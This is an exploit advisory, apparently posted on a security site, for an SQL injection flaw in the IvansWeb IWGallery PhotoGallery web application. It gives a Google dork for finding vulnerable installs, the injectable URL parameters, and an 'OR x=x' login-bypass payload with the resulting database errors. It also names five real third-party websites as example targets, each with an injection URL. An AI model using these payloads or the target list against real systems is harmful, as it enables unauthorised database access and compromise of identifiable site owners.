Powered by IvansWeb IWGallery PhotoGallery © 2005/2007 SQL Injection Vulnerability

2018.06.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Powered by IvansWeb IWGallery PhotoGallery © 2005/2007 SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 30/06/2018 # Vendor Homepages : ivansweb.com ~ iwgallery.com ~ github.com/ingowalther ~ iwstudio.it # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered by IvansWeb - All Rights Reserved © 2005/2007'' intext:''Vietata la riproduzione anche parziale delle immagini'' /iwgallery/ # Exploits : /iwgallery/pictures/cat.asp?iCat=[ID-NUMBER]&offset=[SQL Inj] /iwgallery/pictures/cat.asp?iCat=[SQL Inj] # Admin Login Panel : /admin/login.asp # When try to enter Admin Panel through the SQL Authentication Bypass with this exploit anything' OR 'x'='x an SQL Injection error occurs. Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near '?èÂ'. /admin/login.asp, line 68 ################################################################################################# # Example Sites => icmpetroli.it/iwgallery/pictures/cat.asp?iCat=01&offset=6%27 arcobalenobeb.com/iwgallery/pictures/cat.asp?iCat=1%27 assicurazionipassera.it/iwgallery/pictures/cat.asp?iCat=2%27 studioegmsrl.it/iwgallery/pictures/cat.asp?iCat=9%27 ospacralaslromag.it/iwgallery/pictures/cat.asp?iCat=1%27 [ Proof of Concept for SQL Inj ] => archive.is/t7UlF # SQL Database Error => Microsoft VBScript runtime error '800a000d' Type mismatch: '[string: "6%27"]' /iwgallery/pictures/inc_cat.asp, line 224 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top